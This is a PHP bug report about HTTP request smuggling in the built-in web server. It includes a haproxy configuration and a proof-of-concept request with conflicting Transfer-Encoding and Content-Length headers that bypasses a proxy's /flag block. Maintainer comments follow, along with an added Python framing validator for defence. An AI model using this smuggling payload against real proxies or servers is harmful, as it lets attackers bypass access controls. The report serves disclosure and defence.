Bug #80043 HTTP Request Smuggling in php webserver
Submitted: 2020-09-01 07:09 UTC Modified: 2021-11-15 15:42 UTC
Avg. Score:5.0 ± 0.0
Reproduced:1 of 1 (100.0%)
Same Version:1 (100.0%)
Same OS:1 (100.0%)
From: kn0wns1c at gmail dot com Assigned:
Status: Open Package: Built-in web server
PHP Version: master-Git-2020-09-01 (Git) OS:
Private report: No CVE-ID: None

 [2020-09-01 07:09 UTC] kn0wns1c at gmail dot com
The function php_http_parser_execute in sapi\cli\php_http_parser.c parses HTTP requests. When I send two Transfer-Encoding headers, one true and one false, in one HTTP request, it will think that it is a legal request. An attacker may use this feature to make an HTTP Request Smuggling attack.

For example, using haproxy to make a CL-TE attack:

haproxy version 1.5.3, haproxy.cfg
haproxy.cfg forbids access to the /flag URI

 maxconn 256

 mode http
 timeout connect 5000ms
 timeout client 50000ms
 timeout server 50000ms

frontend http-in
 bind *:80
 default_backend servers
 acl url_403 path_beg -i /flag
 http-request deny if url_403

backend servers
 server server1 maxconn 32

Run the PHP web server

php -S

Using this HTTP request can bypass the haproxy /flag restriction

Transfer-Encoding: chunked
Transfer-Encoding: chunked-false
Content-Length: 50


GET /flag HTTP/1.1



 [2020-09-01 07:12 UTC]
-Type: Security +Type: Bug
 [2020-09-01 07:12 UTC]
PHP CLI server is a debug feature and as such bugs in it are not security issues. See
 [2021-11-15 15:42 UTC]
> Transfer-Encoding: chunked-false

According to RFC 7230, section 3.3.1[1], the built-in Webserver
should respond with 501 (Not implemented), since it doesn't
support this transfer coding.  However, such faked values are a
very minor problem here.  The bigger problem is that the built-in
Webserver does not even understand generally known values, such as

  Transfer-Encoding: gzip, chunked

but does not reply with 501 either.  The only understood
Transfer-Encoding value is `chunked`.  We may consider changing
this to a doc problem.

[1] <>
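
An added example (not PHP's code and not part of the report or its comments) of the strict framing check the last comment points to: repeated Transfer-Encoding lines are merged into one list, an unsupported coding gets 501, and ambiguous framing gets 400. The names `framing_decision` and `SUPPORTED`, and the request line and Host value in the sample, are assumptions made for illustration; rejecting Transfer-Encoding together with Content-Length is this example's strictness choice.

```python
# Added example, not PHP's code: strict request-framing check (RFC 7230 3.3.1-3.3.3).
SUPPORTED = {"chunked"}  # assumption: only chunked is implemented, as the comment above states


def framing_decision(head: bytes):
    """Return (status, detail) for a raw request head; 200 means the framing is unambiguous."""
    codings, lengths = [], set()
    for line in head.split(b"\r\n")[1:]:           # skip the request line
        if not line:
            break                                   # blank line ends the header section
        name, sep, value = line.partition(b":")
        if not sep or not name or name != name.strip():
            return 400, "malformed header line"     # whitespace before the colon, folded lines
        key = name.decode("latin-1").lower()
        text = value.decode("latin-1").strip()
        if key == "transfer-encoding":
            # Repeated header lines form one comma-separated list, in order.
            codings += [c.strip().lower() for c in text.split(",") if c.strip()]
        elif key == "content-length":
            lengths.add(text)
    unknown = [c for c in codings if c not in SUPPORTED]
    if unknown:
        return 501, "unsupported transfer coding: " + ", ".join(unknown)
    if codings and lengths:
        return 400, "both Transfer-Encoding and Content-Length present"
    if codings:
        if codings != ["chunked"]:
            return 400, "chunked must be applied exactly once"
        return 200, "chunked"
    if len(lengths) > 1 or any(not (v.isascii() and v.isdigit()) for v in lengths):
        return 400, "invalid or conflicting Content-Length"
    if lengths:
        return 200, "content-length " + lengths.pop()
    return 200, "no body"


# Constructed sample: the header set from the report, with a placeholder request line and Host.
REPORTED = (b"POST / HTTP/1.1\r\nHost: example.test\r\n"
            b"Transfer-Encoding: chunked\r\nTransfer-Encoding: chunked-false\r\n"
            b"Content-Length: 50\r\n\r\n")

if __name__ == "__main__":
    print(framing_decision(REPORTED))
```

Running the same decision on both the proxy side and the backend side of a test setup shows whether the two hops agree on where a request ends.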
Last updated: Fri Jun 21 12:01:29 2024 UTC